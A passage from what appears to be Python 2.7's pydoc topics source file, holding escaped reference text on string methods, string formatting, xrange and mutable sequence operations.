empty.\n\n5. The slice of *s* from *i* to *j* with step *k* is defined as the\n sequence of items with index "x = i + n*k" such that "0 <= n <\n (j-i)/k". In other words, the indices are "i", "i+k", "i+2*k",\n "i+3*k" and so on, stopping when *j* is reached (but never\n including *j*). If *i* or *j* is greater than "len(s)", use\n "len(s)". If *i* or *j* are omitted or "None", they become "end"\n values (which end depends on the sign of *k*). Note, *k* cannot be\n zero. If *k* is "None", it is treated like "1".\n\n6. **CPython implementation detail:** If *s* and *t* are both\n strings, some Python implementations such as CPython can usually\n perform an in-place optimization for assignments of the form "s = s\n + t" or "s += t". When applicable, this optimization makes\n quadratic run-time much less likely. This optimization is both\n version and implementation dependent. For performance sensitive\n code, it is preferable to use the "str.join()" method which assures\n consistent linear concatenation performance across versions and\n implementations.\n\n Changed in version 2.4: Formerly, string concatenation never\n occurred in-place.\n\n\nString Methods\n==============\n\nBelow are listed the string methods which both 8-bit strings and\nUnicode objects support. Some of them are also available on\n"bytearray" objects.\n\nIn addition, Python\'s strings support the sequence type methods\ndescribed in the Sequence Types --- str, unicode, list, tuple,\nbytearray, buffer, xrange section. To output formatted strings use\ntemplate strings or the "%" operator described in the String\nFormatting Operations section. Also, see the "re" module for string\nfunctions based on regular expressions.\n\nstr.capitalize()\n\n Return a copy of the string with its first character capitalized\n and the rest lowercased.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.center(width[, fillchar])\n\n Return centered in a string of length *width*. Padding is done\n using the specified *fillchar* (default is a space).\n\n Changed in version 2.4: Support for the *fillchar* argument.\n\nstr.count(sub[, start[, end]])\n\n Return the number of non-overlapping occurrences of substring *sub*\n in the range [*start*, *end*]. Optional arguments *start* and\n *end* are interpreted as in slice notation.\n\nstr.decode([encoding[, errors]])\n\n Decodes the string using the codec registered for *encoding*.\n *encoding* defaults to the default string encoding. *errors* may\n be given to set a different error handling scheme. The default is\n "\'strict\'", meaning that encoding errors raise "UnicodeError".\n Other possible values are "\'ignore\'", "\'replace\'" and any other\n name registered via "codecs.register_error()", see section Codec\n Base Classes.\n\n New in version 2.2.\n\n Changed in version 2.3: Support for other error handling schemes\n added.\n\n Changed in version 2.7: Support for keyword arguments added.\n\nstr.encode([encoding[, errors]])\n\n Return an encoded version of the string. Default encoding is the\n current default string encoding. *errors* may be given to set a\n different error handling scheme. The default for *errors* is\n "\'strict\'", meaning that encoding errors raise a "UnicodeError".\n Other possible values are "\'ignore\'", "\'replace\'",\n "\'xmlcharrefreplace\'", "\'backslashreplace\'" and any other name\n registered via "codecs.register_error()", see section Codec Base\n Classes. For a list of possible encodings, see section Standard\n Encodings.\n\n New in version 2.0.\n\n Changed in version 2.3: Support for "\'xmlcharrefreplace\'" and\n "\'backslashreplace\'" and other error handling schemes added.\n\n Changed in version 2.7: Support for keyword arguments added.\n\nstr.endswith(suffix[, start[, end]])\n\n Return "True" if the string ends with the specified *suffix*,\n otherwise return "False". *suffix* can also be a tuple of suffixes\n to look for. With optional *start*, test beginning at that\n position. With optional *end*, stop comparing at that position.\n\n Changed in version 2.5: Accept tuples as *suffix*.\n\nstr.expandtabs([tabsize])\n\n Return a copy of the string where all tab characters are replaced\n by one or more spaces, depending on the current column and the\n given tab size. Tab positions occur every *tabsize* characters\n (default is 8, giving tab positions at columns 0, 8, 16 and so on).\n To expand the string, the current column is set to zero and the\n string is examined character by character. If the character is a\n tab ("\\t"), one or more space characters are inserted in the result\n until the current column is equal to the next tab position. (The\n tab character itself is not copied.) If the character is a newline\n ("\\n") or return ("\\r"), it is copied and the current column is\n reset to zero. Any other character is copied unchanged and the\n current column is incremented by one regardless of how the\n character is represented when printed.\n\n >>> \'01\\t012\\t0123\\t01234\'.expandtabs()\n \'01 012 0123 01234\'\n >>> \'01\\t012\\t0123\\t01234\'.expandtabs(4)\n \'01 012 0123 01234\'\n\nstr.find(sub[, start[, end]])\n\n Return the lowest index in the string where substring *sub* is\n found within the slice "s[start:end]". Optional arguments *start*\n and *end* are interpreted as in slice notation. Return "-1" if\n *sub* is not found.\n\n Note: The "find()" method should be used only if you need to know\n the position of *sub*. To check if *sub* is a substring or not,\n use the "in" operator:\n\n >>> \'Py\' in \'Python\'\n True\n\nstr.format(*args, **kwargs)\n\n Perform a string formatting operation. The string on which this\n method is called can contain literal text or replacement fields\n delimited by braces "{}". Each replacement field contains either\n the numeric index of a positional argument, or the name of a\n keyword argument. Returns a copy of the string where each\n replacement field is replaced with the string value of the\n corresponding argument.\n\n >>> "The sum of 1 + 2 is {0}".format(1+2)\n \'The sum of 1 + 2 is 3\'\n\n See Format String Syntax for a description of the various\n formatting options that can be specified in format strings.\n\n This method of string formatting is the new standard in Python 3,\n and should be preferred to the "%" formatting described in String\n Formatting Operations in new code.\n\n New in version 2.6.\n\nstr.index(sub[, start[, end]])\n\n Like "find()", but raise "ValueError" when the substring is not\n found.\n\nstr.isalnum()\n\n Return true if all characters in the string are alphanumeric and\n there is at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isalpha()\n\n Return true if all characters in the string are alphabetic and\n there is at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isdigit()\n\n Return true if all characters in the string are digits and there is\n at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.islower()\n\n Return true if all cased characters [4] in the string are lowercase\n and there is at least one cased character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isspace()\n\n Return true if there are only whitespace characters in the string\n and there is at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.istitle()\n\n Return true if the string is a titlecased string and there is at\n least one character, for example uppercase characters may only\n follow uncased characters and lowercase characters only cased ones.\n Return false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isupper()\n\n Return true if all cased characters [4] in the string are uppercase\n and there is at least one cased character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.join(iterable)\n\n Return a string which is the concatenation of the strings in the\n *iterable* *iterable*. The separator between elements is the\n string providing this method.\n\nstr.ljust(width[, fillchar])\n\n Return the string left justified in a string of length *width*.\n Padding is done using the specified *fillchar* (default is a\n space). The original string is returned if *width* is less than or\n equal to "len(s)".\n\n Changed in version 2.4: Support for the *fillchar* argument.\n\nstr.lower()\n\n Return a copy of the string with all the cased characters [4]\n converted to lowercase.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.lstrip([chars])\n\n Return a copy of the string with leading characters removed. The\n *chars* argument is a string specifying the set of characters to be\n removed. If omitted or "None", the *chars* argument defaults to\n removing whitespace. The *chars* argument is not a prefix; rather,\n all combinations of its values are stripped:\n\n >>> \' spacious \'.lstrip()\n \'spacious \'\n >>> \'www.example.com\'.lstrip(\'cmowz.\')\n \'example.com\'\n\n Changed in version 2.2.2: Support for the *chars* argument.\n\nstr.partition(sep)\n\n Split the string at the first occurrence of *sep*, and return a\n 3-tuple containing the part before the separator, the separator\n itself, and the part after the separator. If the separator is not\n found, return a 3-tuple containing the string itself, followed by\n two empty strings.\n\n New in version 2.5.\n\nstr.replace(old, new[, count])\n\n Return a copy of the string with all occurrences of substring *old*\n replaced by *new*. If the optional argument *count* is given, only\n the first *count* occurrences are replaced.\n\nstr.rfind(sub[, start[, end]])\n\n Return the highest index in the string where substring *sub* is\n found, such that *sub* is contained within "s[start:end]".\n Optional arguments *start* and *end* are interpreted as in slice\n notation. Return "-1" on failure.\n\nstr.rindex(sub[, start[, end]])\n\n Like "rfind()" but raises "ValueError" when the substring *sub* is\n not found.\n\nstr.rjust(width[, fillchar])\n\n Return the string right justified in a string of length *width*.\n Padding is done using the specified *fillchar* (default is a\n space). The original string is returned if *width* is less than or\n equal to "len(s)".\n\n Changed in version 2.4: Support for the *fillchar* argument.\n\nstr.rpartition(sep)\n\n Split the string at the last occurrence of *sep*, and return a\n 3-tuple containing the part before the separator, the separator\n itself, and the part after the separator. If the separator is not\n found, return a 3-tuple containing two empty strings, followed by\n the string itself.\n\n New in version 2.5.\n\nstr.rsplit([sep[, maxsplit]])\n\n Return a list of the words in the string, using *sep* as the\n delimiter string. If *maxsplit* is given, at most *maxsplit* splits\n are done, the *rightmost* ones. If *sep* is not specified or\n "None", any whitespace string is a separator. Except for splitting\n from the right, "rsplit()" behaves like "split()" which is\n described in detail below.\n\n New in version 2.4.\n\nstr.rstrip([chars])\n\n Return a copy of the string with trailing characters removed. The\n *chars* argument is a string specifying the set of characters to be\n removed. If omitted or "None", the *chars* argument defaults to\n removing whitespace. The *chars* argument is not a suffix; rather,\n all combinations of its values are stripped:\n\n >>> \' spacious \'.rstrip()\n \' spacious\'\n >>> \'mississippi\'.rstrip(\'ipz\')\n \'mississ\'\n\n Changed in version 2.2.2: Support for the *chars* argument.\n\nstr.split([sep[, maxsplit]])\n\n Return a list of the words in the string, using *sep* as the\n delimiter string. If *maxsplit* is given, at most *maxsplit*\n splits are done (thus, the list will have at most "maxsplit+1"\n elements). If *maxsplit* is not specified or "-1", then there is\n no limit on the number of splits (all possible splits are made).\n\n If *sep* is given, consecutive delimiters are not grouped together\n and are deemed to delimit empty strings (for example,\n "\'1,,2\'.split(\',\')" returns "[\'1\', \'\', \'2\']"). The *sep* argument\n may consist of multiple characters (for example,\n "\'1<>2<>3\'.split(\'<>\')" returns "[\'1\', \'2\', \'3\']"). Splitting an\n empty string with a specified separator returns "[\'\']".\n\n If *sep* is not specified or is "None", a different splitting\n algorithm is applied: runs of consecutive whitespace are regarded\n as a single separator, and the result will contain no empty strings\n at the start or end if the string has leading or trailing\n whitespace. Consequently, splitting an empty string or a string\n consisting of just whitespace with a "None" separator returns "[]".\n\n For example, "\' 1 2 3 \'.split()" returns "[\'1\', \'2\', \'3\']", and\n "\' 1 2 3 \'.split(None, 1)" returns "[\'1\', \'2 3 \']".\n\nstr.splitlines([keepends])\n\n Return a list of the lines in the string, breaking at line\n boundaries. This method uses the *universal newlines* approach to\n splitting lines. Line breaks are not included in the resulting list\n unless *keepends* is given and true.\n\n For example, "\'ab c\\n\\nde fg\\rkl\\r\\n\'.splitlines()" returns "[\'ab\n c\', \'\', \'de fg\', \'kl\']", while the same call with\n "splitlines(True)" returns "[\'ab c\\n\', \'\\n\', \'de fg\\r\', \'kl\\r\\n\']".\n\n Unlike "split()" when a delimiter string *sep* is given, this\n method returns an empty list for the empty string, and a terminal\n line break does not result in an extra line.\n\nstr.startswith(prefix[, start[, end]])\n\n Return "True" if string starts with the *prefix*, otherwise return\n "False". *prefix* can also be a tuple of prefixes to look for.\n With optional *start*, test string beginning at that position.\n With optional *end*, stop comparing string at that position.\n\n Changed in version 2.5: Accept tuples as *prefix*.\n\nstr.strip([chars])\n\n Return a copy of the string with the leading and trailing\n characters removed. The *chars* argument is a string specifying the\n set of characters to be removed. If omitted or "None", the *chars*\n argument defaults to removing whitespace. The *chars* argument is\n not a prefix or suffix; rather, all combinations of its values are\n stripped:\n\n >>> \' spacious \'.strip()\n \'spacious\'\n >>> \'www.example.com\'.strip(\'cmowz.\')\n \'example\'\n\n Changed in version 2.2.2: Support for the *chars* argument.\n\nstr.swapcase()\n\n Return a copy of the string with uppercase characters converted to\n lowercase and vice versa.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.title()\n\n Return a titlecased version of the string where words start with an\n uppercase character and the remaining characters are lowercase.\n\n The algorithm uses a simple language-independent definition of a\n word as groups of consecutive letters. The definition works in\n many contexts but it means that apostrophes in contractions and\n possessives form word boundaries, which may not be the desired\n result:\n\n >>> "they\'re bill\'s friends from the UK".title()\n "They\'Re Bill\'S Friends From The Uk"\n\n A workaround for apostrophes can be constructed using regular\n expressions:\n\n >>> import re\n >>> def titlecase(s):\n ... return re.sub(r"[A-Za-z]+(\'[A-Za-z]+)?",\n ... lambda mo: mo.group(0)[0].upper() +\n ... mo.group(0)[1:].lower(),\n ... s)\n ...\n >>> titlecase("they\'re bill\'s friends.")\n "They\'re Bill\'s Friends."\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.translate(table[, deletechars])\n\n Return a copy of the string where all characters occurring in the\n optional argument *deletechars* are removed, and the remaining\n characters have been mapped through the given translation table,\n which must be a string of length 256.\n\n You can use the "maketrans()" helper function in the "string"\n module to create a translation table. For string objects, set the\n *table* argument to "None" for translations that only delete\n characters:\n\n >>> \'read this short text\'.translate(None, \'aeiou\')\n \'rd ths shrt txt\'\n\n New in version 2.6: Support for a "None" *table* argument.\n\n For Unicode objects, the "translate()" method does not accept the\n optional *deletechars* argument. Instead, it returns a copy of the\n *s* where all characters have been mapped through the given\n translation table which must be a mapping of Unicode ordinals to\n Unicode ordinals, Unicode strings or "None". Unmapped characters\n are left untouched. Characters mapped to "None" are deleted. Note,\n a more flexible approach is to create a custom character mapping\n codec using the "codecs" module (see "encodings.cp1251" for an\n example).\n\nstr.upper()\n\n Return a copy of the string with all the cased characters [4]\n converted to uppercase. Note that "str.upper().isupper()" might be\n "False" if "s" contains uncased characters or if the Unicode\n category of the resulting character(s) is not "Lu" (Letter,\n uppercase), but e.g. "Lt" (Letter, titlecase).\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.zfill(width)\n\n Return the numeric string left filled with zeros in a string of\n length *width*. A sign prefix is handled correctly. The original\n string is returned if *width* is less than or equal to "len(s)".\n\n New in version 2.2.2.\n\nThe following methods are present only on unicode objects:\n\nunicode.isnumeric()\n\n Return "True" if there are only numeric characters in S, "False"\n otherwise. Numeric characters include digit characters, and all\n characters that have the Unicode numeric value property, e.g.\n U+2155, VULGAR FRACTION ONE FIFTH.\n\nunicode.isdecimal()\n\n Return "True" if there are only decimal characters in S, "False"\n otherwise. Decimal characters include digit characters, and all\n characters that can be used to form decimal-radix numbers, e.g.\n U+0660, ARABIC-INDIC DIGIT ZERO.\n\n\nString Formatting Operations\n============================\n\nString and Unicode objects have one unique built-in operation: the "%"\noperator (modulo). This is also known as the string *formatting* or\n*interpolation* operator. Given "format % values" (where *format* is\na string or Unicode object), "%" conversion specifications in *format*\nare replaced with zero or more elements of *values*. The effect is\nsimilar to the using "sprintf()" in the C language. If *format* is a\nUnicode object, or if any of the objects being converted using the\n"%s" conversion are Unicode objects, the result will also be a Unicode\nobject.\n\nIf *format* requires a single argument, *values* may be a single non-\ntuple object. [5] Otherwise, *values* must be a tuple with exactly\nthe number of items specified by the format string, or a single\nmapping object (for example, a dictionary).\n\nA conversion specifier contains two or more characters and has the\nfollowing components, which must occur in this order:\n\n1. The "\'%\'" character, which marks the start of the specifier.\n\n2. Mapping key (optional), consisting of a parenthesised sequence\n of characters (for example, "(somename)").\n\n3. Conversion flags (optional), which affect the result of some\n conversion types.\n\n4. Minimum field width (optional). If specified as an "\'*\'"\n (asterisk), the actual width is read from the next element of the\n tuple in *values*, and the object to convert comes after the\n minimum field width and optional precision.\n\n5. Precision (optional), given as a "\'.\'" (dot) followed by the\n precision. If specified as "\'*\'" (an asterisk), the actual width\n is read from the next element of the tuple in *values*, and the\n value to convert comes after the precision.\n\n6. Length modifier (optional).\n\n7. Conversion type.\n\nWhen the right argument is a dictionary (or other mapping type), then\nthe formats in the string *must* include a parenthesised mapping key\ninto that dictionary inserted immediately after the "\'%\'" character.\nThe mapping key selects the value to be formatted from the mapping.\nFor example:\n\n>>> print \'%(language)s has %(number)03d quote types.\' % \\\n... {"language": "Python", "number": 2}\nPython has 002 quote types.\n\nIn this case no "*" specifiers may occur in a format (since they\nrequire a sequential parameter list).\n\nThe conversion flag characters are:\n\n+-----------+-----------------------------------------------------------------------+\n| Flag | Meaning |\n+===========+=======================================================================+\n| "\'#\'" | The value conversion will use the "alternate form" (where defined |\n| | below). |\n+-----------+-----------------------------------------------------------------------+\n| "\'0\'" | The conversion will be zero padded for numeric values. |\n+-----------+-----------------------------------------------------------------------+\n| "\'-\'" | The converted value is left adjusted (overrides the "\'0\'" conversion |\n| | if both are given). |\n+-----------+-----------------------------------------------------------------------+\n| "\' \'" | (a space) A blank should be left before a positive number (or empty |\n| | string) produced by a signed conversion. |\n+-----------+-----------------------------------------------------------------------+\n| "\'+\'" | A sign character ("\'+\'" or "\'-\'") will precede the conversion |\n| | (overrides a "space" flag). |\n+-----------+-----------------------------------------------------------------------+\n\nA length modifier ("h", "l", or "L") may be present, but is ignored as\nit is not necessary for Python -- so e.g. "%ld" is identical to "%d".\n\nThe conversion types are:\n\n+--------------+-------------------------------------------------------+---------+\n| Conversion | Meaning | Notes |\n+==============+=======================================================+=========+\n| "\'d\'" | Signed integer decimal. | |\n+--------------+-------------------------------------------------------+---------+\n| "\'i\'" | Signed integer decimal. | |\n+--------------+-------------------------------------------------------+---------+\n| "\'o\'" | Signed octal value. | (1) |\n+--------------+-------------------------------------------------------+---------+\n| "\'u\'" | Obsolete type -- it is identical to "\'d\'". | (7) |\n+--------------+-------------------------------------------------------+---------+\n| "\'x\'" | Signed hexadecimal (lowercase). | (2) |\n+--------------+-------------------------------------------------------+---------+\n| "\'X\'" | Signed hexadecimal (uppercase). | (2) |\n+--------------+-------------------------------------------------------+---------+\n| "\'e\'" | Floating point exponential format (lowercase). | (3) |\n+--------------+-------------------------------------------------------+---------+\n| "\'E\'" | Floating point exponential format (uppercase). | (3) |\n+--------------+-------------------------------------------------------+---------+\n| "\'f\'" | Floating point decimal format. | (3) |\n+--------------+-------------------------------------------------------+---------+\n| "\'F\'" | Floating point decimal format. | (3) |\n+--------------+-------------------------------------------------------+---------+\n| "\'g\'" | Floating point format. Uses lowercase exponential | (4) |\n| | format if exponent is less than -4 or not less than | |\n| | precision, decimal format otherwise. | |\n+--------------+-------------------------------------------------------+---------+\n| "\'G\'" | Floating point format. Uses uppercase exponential | (4) |\n| | format if exponent is less than -4 or not less than | |\n| | precision, decimal format otherwise. | |\n+--------------+-------------------------------------------------------+---------+\n| "\'c\'" | Single character (accepts integer or single character | |\n| | string). | |\n+--------------+-------------------------------------------------------+---------+\n| "\'r\'" | String (converts any Python object using repr()). | (5) |\n+--------------+-------------------------------------------------------+---------+\n| "\'s\'" | String (converts any Python object using "str()"). | (6) |\n+--------------+-------------------------------------------------------+---------+\n| "\'%\'" | No argument is converted, results in a "\'%\'" | |\n| | character in the result. | |\n+--------------+-------------------------------------------------------+---------+\n\nNotes:\n\n1. The alternate form causes a leading zero ("\'0\'") to be inserted\n between left-hand padding and the formatting of the number if the\n leading character of the result is not already a zero.\n\n2. The alternate form causes a leading "\'0x\'" or "\'0X\'" (depending\n on whether the "\'x\'" or "\'X\'" format was used) to be inserted\n between left-hand padding and the formatting of the number if the\n leading character of the result is not already a zero.\n\n3. The alternate form causes the result to always contain a decimal\n point, even if no digits follow it.\n\n The precision determines the number of digits after the decimal\n point and defaults to 6.\n\n4. The alternate form causes the result to always contain a decimal\n point, and trailing zeroes are not removed as they would otherwise\n be.\n\n The precision determines the number of significant digits before\n and after the decimal point and defaults to 6.\n\n5. The "%r" conversion was added in Python 2.0.\n\n The precision determines the maximal number of characters used.\n\n6. If the object or format provided is a "unicode" string, the\n resulting string will also be "unicode".\n\n The precision determines the maximal number of characters used.\n\n7. See **PEP 237**.\n\nSince Python strings have an explicit length, "%s" conversions do not\nassume that "\'\\0\'" is the end of the string.\n\nChanged in version 2.7: "%f" conversions for numbers whose absolute\nvalue is over 1e50 are no longer replaced by "%g" conversions.\n\nAdditional string operations are defined in standard modules "string"\nand "re".\n\n\nXRange Type\n===========\n\nThe "xrange" type is an immutable sequence which is commonly used for\nlooping. The advantage of the "xrange" type is that an "xrange"\nobject will always take the same amount of memory, no matter the size\nof the range it represents. There are no consistent performance\nadvantages.\n\nXRange objects have very little behavior: they only support indexing,\niteration, and the "len()" function.\n\n\nMutable Sequence Types\n======================\n\nList and "bytearray" objects support additional operations that allow\nin-place modification of the object. Other mutable sequence types\n(when added to the language) should also support these operations.\nStrings and tuples are immutable sequence types: such objects cannot\nbe modified once created. The following operations are defined on\nmutable sequence types (where *x* is an arbitrary object):\n\n+--------------------------------+----------------------------------+-----------------------+\n| Operation | Result | Notes |\n+================================+==================================+=======================+\n| "s[i] = x" | item *i* of *s* is replaced by | |\n| | *x* | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s[i:j] = t" | slice of *s* from *i* to *j* is | |\n| | replaced by the contents of the | |\n| | iterable *t* | |\n+--------------------------------+----------------------------------+-----------------------+\n| "del s[i:j]" | same as "s[i:j] = []" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s[i:j:k] = t" | the elements of "s[i:j:k]" are | (1) |\n| | replaced by those of *t* | |\n+--------------------------------+----------------------------------+-----------------------+\n| "del s[i:j:k]" | removes the elements of | |\n| | "s[i:j:k]" from the list | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.append(x)" | same as "s[len(s):len(s)] = [x]" | (2) |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.extend(x)" or "s += t" | for the most part the same as | (3) |\n| | "s[len(s):len(s)] = x" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s *= n" | updates *s* with its contents | (11) |\n| | repeated *n* times | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.count(x)" | return number of *i*\'s for which | |\n| | "s[i] == x" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.index(x[, i[, j]])" | return smallest *k* such that | (4) |\n| | "s[k] == x" and "i <= k < j" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.insert(i, x)" | same as "s[i:i] = [x]" | (5) |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.pop([i])" | same as "x = s[i]; del s[i]; | (6) |\n| | return x" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.remove(x)" | same as "del s[s.index(x)]" | (4) |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.reverse()" | reverses the items of *s* in | (7) |\n| | place | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.sort([cmp[, key[, | sort the items of *s* in place | (7)(8)(9)(10) |\n| reverse]]])" | | |\n+--------------------------------+----------------------------------+-----------------------+\n\nNotes:\n\n1. *t* must have the same length as the slice it is replacing.\n\n2. The C implementation of Python has historically accepted\n multiple parameters and implicitly joined them into a tuple; this\n no longer works in Python 2.0. Use of this misfeature has been\n deprecated since Python 1.4.\n\n3. *x* can be any iterable object.\n\n4. Raises "ValueError" when *x* is not found in *s*. When a\n negative index is passed as the second or third parameter to the\n "index()" method, the list length is added, as for slice indices.\n If it is still negative, it is truncated to zero, as for slice\n indices.\n\n Changed in version 2.3: Previously, "index()" didn\'t have arguments\n for specifying start and stop positions.\n\n5. When a negative index is passed as the first parameter to the\n "insert()" method, the list length is added, as for slice indices.\n If it is still negative, it is truncated to zero, as for slice\n indices.\n\n Changed in version 2.3: Previously, all negative indices were\n truncated to zero.\n\n6. The "pop()" method\'s optional argument *i* defaults to "-1", so\n that by default the last item is removed and returned.\n\n7. The "sort()" and "reverse()" methods modify the list in place\n for economy of space when sorting or reversing a large list. To\n remind you that they operate by side effect, they don\'t return the\n sorted or reversed list.\n\n8. The "sort()" method takes optional arguments for controlling the\n comparisons.\n\n *cmp* specifies a custom comparison function of two arguments (list\n items) which should return a negative, zero or positive number\n depending on whether the first argument is considered smaller than,\n equal to, or larger than the second argument: "cmp=lambda x,y:\n cmp(x.lower(), y.lower())". The default value is "None".\n\n *key* specifies a function of one argument that is used to extract\n a comparison key from each list element: "key=str.lower". The\n default value is "None".\n\n *reverse* is a boolean value. If set to "True", then the list\n elements are sorted as if each comparison were reversed.\n\n In general, the *key* and *reverse* conversion processes are much\n faster than specifying an equivalent *cmp* function. This is\n because *cmp* is called multiple times for each list element while\n *key* and *reverse* touch each element only once. Use\n "functools.cmp_to_key()" to convert an old-style *cmp* function to\n a *key* function.\n\n Changed in version 2.3: Support for "None" as an equivalent to\n omitting *cmp* was added.\n\n Changed in version 2.4: Support for *key* and *reverse* was added.\n\n9. Starting with Python 2.3, the "sort()" method is guaranteed to\n be stable. A sort is stable if it guarantees not to change the\n relative order of elements that compare equal --- this is helpful\n for sorting in multiple passes (for example, sort by department,\n then by salary grade).\n\n10. **CPython implementation detail:** While a list is being\n sorted, the effect of attempting to mutate, or even inspect, the\n list is undefined. The C implementation of Python 2.3 and newer\n makes the list appear empty for the duration, and raises\n "ValueError" if it can detect that the list has been mutated\n during a sort.\n\n11. The value *n* is an integer, or an object implementing\n "__index__()". Zero and negative values of *n* clear the\n sequence. Items in the sequence are not copied; they are\n referenced multiple times, as explained for "s * n" under Sequence\n Types --- str, unicode, list, tuple, bytearray, buffer, xrange.\n', 'typesseq-mutable': u'\nMutable Sequence Types\n**********************\n\nList and "bytearray" objects support additional operations that allow\nin-place modification of the object. Other mutable sequence types\n(when added to the language) should also support these operations.\nStrings and tuples are immutable sequence types: such objects cannot\nbe modified once created. The following operations are defined on\nmutable sequence types (where *x* is an arbitrary object):\n\n+--------------------------------+----------------------------------+-----------------------+\n| Operation | Result | Notes |\n+================================+==================================+=======================+\n| "s[i] = x" | item *i* of *s* is replaced by | |\n| | *x* | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s[i:j] = t" | slice of *s* from *i* to *j* is | |\n| | replaced by the contents of the | |\n| | iterable *t* | |\n+--------------------------------+----------------------------------+-----------------------+\n| "del s[i:j]" | same as "s[i:j] = []" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s[i:j:k] = t" | the elements of "s[i:j:k]" are | (1) |\n| | replaced by those of *t* | |\n+--------------------------------+----------------------------------+-----------------------+\n| "del s[i:j:k]" | removes the elements of | |\n| | "s[i:j:k]" from the list | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.append(x)" | same as "s[len(s):len(s)] = [x]" | (2) |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.extend(x)" or "s += t" | for the most part the same as | (3) |\n| | "s[len(s):len(s)] = x" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s *= n" | updates *s* with its contents | (11) |\n| | repeated *n* times | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.count(x)" | return number of *i*\'s for which | |\n| | "s[i] == x" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.index(x[, i[, j]])" | return smallest *k* such that | (4) |\n| | "s[k] == x" and "i <= k < j" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.insert(i, x)" | same as "s[i:i] = [x]" | (5) |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.pop([i])" | same as "x = s[i]; del s[i]; | (6) |\n| | return x" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.remove(x)" | same as "del s[s.index(x)]" | (4) |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.reverse()" | reverses the items of *s* in | (7) |\n| | place | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.sort([cmp[, key[, | sort the items of *s* in place | (7)(8)(9)(10) |\n| reverse]]])" | | |\n+--------------------------------+----------------------------------+-----------------------+\n\nNotes:\n\n1. *t* must have the same length as the slice it is replacing.\n\n2. The C implementation of Python has historically accepted\n multiple parameters and implicitly joined them into a tuple; this\n no longer works in Python 2.0. Use of this misfeature has been\n deprecated since Python 1.4.\n\n3. *x* can be any iterable object.\n\n4. Raises "ValueError" when *x* is not found in *s*. When a\n negative index is passed as the second or third parameter to the\n "index()" method, the list length is added, as for slice indices.\n If it is still negative, it is truncated to zero, as for slice\n indices.\n\n Changed in version 2.3: Previously, "index()" didn\'t have arguments\n for specifying start and stop positions.\n\n5. When a negative index is passed as the first parameter to the\n "insert()" method, the list length is added, as for slice indices.\n If it is still negative, it is truncated to zero, as for slice\n indices.\n\n Changed in version 2.3: Previously, all negative indices were\n truncated to zero.\n\n6. The "pop()" method\'s optional argument *i* defaults to "-1", so\n that by default the last item is removed and returned.\n\n7. The "sort()" and "reverse()" methods modify the list in place\n for economy of space when sorting or reversing a large list. To\n remind you that they operate by side effect, they don\'t return the\n sorted or reversed list.\n\n8. The "sort()" method takes optional arguments for controlling the\n comparisons.\n\n *cmp* specifies a custom comparison function of two arguments (list\n items) which should return a negative, zero or positive number\n depending on whether the first argument is considered smaller than,\n equal to, or larger than the second argument: "cmp=lambda x,y:\n cmp(x.lower(), y.lower())". The default value is "None".\n\n *key* specifies a function of one argument that is used to extract\n a comparison key from each list element: "key=str.lower". The\n default value is "None".\n\n *reverse* is a boolean value. If set to "True", then the list\n elements are sorted as if each comparison were reversed.\n\n In general, the *key* and *reverse* conversion processes are much\n faster than specifying an equivalent *cmp* function. This is\n because *cmp* is called multiple times for each list element while\n *key* and *reverse* touch each element only once. Use\n "functools.cmp_to_key()" to convert an old-style *cmp* function to\n a *key* function.\n\n Changed in version 2.3: Support for "None" as an equivalent to\n omitting *cmp* was added.\n\n Changed in version 2.4: Support for *key* and *reverse* was added.\n\n9. Starting with Python 2.3, the "sort()" method is guaranteed to\n be stable. A sort is stable if it guarantees not to change the\n relative order of elements that compare equal --- this is helpful\n for sorting in multiple passes (for example, sort by department,\n then by salary grade).\n\n10. **CPython implementation detail:** While a list is being\n sorted, the effect of attempting to mutate, or even inspect, the\n list is undefined. The C implementation of Python 2.3 and newer\n makes the list appear empty for the duration, and raises\n "ValueError" if it can detect that the list has been mutated\n during a sort.\n\n11. The value *n* is an integer, or an object implementing\n "__index__()". Zero and negative values of *n* clear the\n sequence. Items in the sequence are not copied; they are\n referenced multiple times, as explained for "s * n" under Sequence\n Types --- str, unicode, list, tuple, bytearray, buffer, xrange.\n', 'unary': u'\nUnary arithmetic and bitwise operations\n***************************************\n\nAll unary arithmetic and bitwise operations have the same priority:\n\n u_expr ::= power | "-" u_expr | "+" u_expr | "~" u_expr\n\nThe unary "-" (minus) operator yields the negation of its numeric\nargument.\n\nThe unary "+" (plus) operator yields its numeric argument unchanged.\n\nThe unary "~" (invert) operator yields the bitwise inversion of its\nplain or long integer argument. The bitwise inversion of "x" is\ndefined as 